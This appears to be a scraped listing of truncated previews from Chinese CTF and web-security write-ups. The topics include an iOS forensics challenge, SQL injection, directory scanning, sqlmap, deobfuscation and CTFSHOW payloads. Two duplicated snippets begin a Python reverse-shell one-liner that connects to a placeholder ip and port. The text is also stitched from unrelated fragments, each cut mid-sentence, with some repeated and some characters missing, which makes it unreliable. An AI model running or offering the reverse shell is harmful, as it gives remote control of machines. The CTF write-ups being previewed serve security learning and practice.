2021陇剑杯网络安全大赛-iOS 题目描述： 一位ios的安全研究员在家中使用手机联网被黑，不仅被窃密还丢失比特币若干，请你通过流量和日志分析后作答：

easy_gogo反序列化，现学现卖，和python反序列化很像 html源码中有提示poc-main.go package main import ("encoding

SQL注入（以Mysql为例） 大致分为有回显和无回显两类进行梳理，重心会放在盲注这一块，正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演

目录 1. 单注入爆破字段2. 双拼注入3. 宽字节注入4. http:192.168.12.108sql45. http:192.168.12.108sql56. 整型注入1.猜注入点（合理用

文章目录 dirsearchdirmapSSRF漏洞出现点sqlmapsqlmap post注入nikto dirsearch dirsearch使用桌面 python dirsearch.py -u 网址 -e * dirmap

首先用IDA打开，发现有很多while(1),大量代码混淆其中 利用defalt进行控制流平坦化去混淆  找到主函数地址好了 开始执行 输入 python .defalt.py hardCpp 0x4007E

python3 -c "import os,socket,subprocess;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ip,port));os.d

python3 -c "import os,socket,subprocess;ssocket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((ip,port));os.d

目录 Flask Metal AlchemistHacker TsDeafconTwo For One参考： Flask Metal Alchemist 没有回显，没有报错，

解压压缩包 解压出来一个文件file 使用file命令进行查看 发现是data 010查看也无果 看到标题是logistic联想到是否与xor文件有关 遂使用工具xortool 工具在此 xortool file 选概率最大的那个 &

PwnTheBox(web篇)简单题文章结构生成# *[id"app"]divsectionmaindiv[1]divdiv[6]divdivdivptitle#xpath提取

解压压缩包 解压出来一个文件file 使用file命令进行查看 发现是data 010查看也无果 看到标题是logistic联想到是否与xor文件有关 遂使用工具xortool 工具在此 xortool file 选概率最大的那个 &

目录GET aHEAD Cookies Insp3ct0r Scavenger Hunt   寻宝游戏  Some Assembly Required 1  where are the robots logon It is my Bir

CTFSHOW 常用姿势篇 群主在视频里面已经讲解的很清楚了，下面内容有些简略，就当补充下payload了。文章目录 CTFSHOW 常用姿势篇web811web812web813web814

CTFSHOW 常用姿势篇 群主在视频里面已经讲解的很清楚了，下面内容有些简略，就当补充下payload了。文章目录 CTFSHOW 常用姿势篇web801web802web803web804web805web806web807web8